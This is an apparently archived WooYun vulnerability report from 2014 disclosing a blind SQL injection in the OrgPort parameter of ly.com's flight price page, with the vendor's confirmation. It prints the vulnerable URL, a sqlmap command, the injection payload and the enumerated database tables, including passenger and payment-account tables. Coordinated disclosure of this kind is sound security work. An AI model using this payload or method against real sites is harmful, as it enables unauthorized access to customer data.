当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062473

漏洞标题:苏州同程旅游网主站存在SQL注入漏洞

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 路人甲

提交时间:2014-05-27 09:57

修复时间:2014-07-11 09:58

公开时间:2014-07-11 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-27: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-06-06: 细节向核心白帽子及相关领域专家公开
2014-06-16: 细节向普通白帽子公开
2014-06-26: 细节向实习白帽子公开
2014-07-11: 细节向公众公开

简要描述:

SQL注入

详细说明:

http://www.ly.com/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 参数orgport存在盲注
sqlmap知道数据库类型 --dbms="microsoft sql server" --dbs
看到这个http://wooyun.org/bugs/wooyun-2010-055900 官方说是老页面,就顺手看看新页面有没有,没有想到还真有。

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: OrgPort
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ajax=GetPageData&OrgPort=CSX' AND 7808=7808 AND 'rjNw'='rjNw&DesPort=&Sort=&CurrPage=2
---
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'TCFly'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: OrgPort
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ajax=GetPageData&OrgPort=CSX' AND 7808=7808 AND 'rjNw'='rjNw&DesPort=&Sort=&CurrPage=2
---
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
Database: TCFly
[60 tables]
+-----------------------------------------+
| dbo.Air_CabinCode |
| dbo.Air_Craft |
| dbo.Air_News |
| dbo.Air_PortCode |
| dbo.Air_WaysCode |
| dbo.AirportServiceDesk |
| dbo.FlightAirLine |
| dbo.FlightBookerHistory |
| dbo.FlightChangeOrder |
| dbo.FlightChangeOrderDetail |
| dbo.FlightChangeOrderSelfDealLog |
| dbo.FlightCnBus |
| dbo.FlightCoupon |
| dbo.FlightDP |
| dbo.FlightDPLog |
| dbo.FlightDelay |
| dbo.FlightETicketNOMonitor |
| dbo.FlightFCAchievement |
| dbo.FlightFCWorkRecord |
| dbo.FlightFDCache |
| dbo.FlightFinanceOverdue |
| dbo.FlightFinanceRefund |
| dbo.FlightFriendlyLink |
| dbo.FlightInsuranceOrder |
| dbo.FlightLineStat |
| dbo.FlightMailRecord |
| dbo.FlightMerchant |
| dbo.FlightMerchantReturnStat |
| dbo.FlightMerchantUrl |
| dbo.FlightMonitorETicketInfo |
| dbo.FlightORAssignHistory |
| dbo.FlightOrder |
| dbo.FlightOrderControlLog |
| dbo.FlightOrderExtend |
| dbo.FlightOrderLog |
| dbo.FlightOrderRouteInfo |
| dbo.FlightPassenger |
| dbo.FlightPicture |
| dbo.FlightPlatformProduct |
| dbo.FlightPortFloor |
| dbo.FlightRejectOrder |
| dbo.FlightRejectRecord |
| dbo.FlightSKCache |
| dbo.FlightSPOrderRelation |
| dbo.FlightSelfOrder |
| dbo.FlightSpecialPrice |
| dbo.FlightSystemUser |
| dbo.FlightTime |
| dbo.Flight_Wap_Mypassenger |
| dbo.Flight_Wap_Order |
| dbo.IdGenerator |
| dbo.MSreplication_objects |
| dbo.MSreplication_subscriptions |
| dbo.MSsavedforeignkeycolumns |
| dbo.MSsavedforeignkeyextendedproperties |
| dbo.MSsavedforeignkeys |
| dbo.MSsnapshotdeliveryprogress |
| dbo.MSsubscription_agents |
| dbo.SpecialsTicketCache |
| dbo.WebPayAccount |
+-----------------------------------------+

QQ图片20140527095147.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-05-27 10:37

厂商回复:

感谢提交,正在修复中

最新状态:

暂无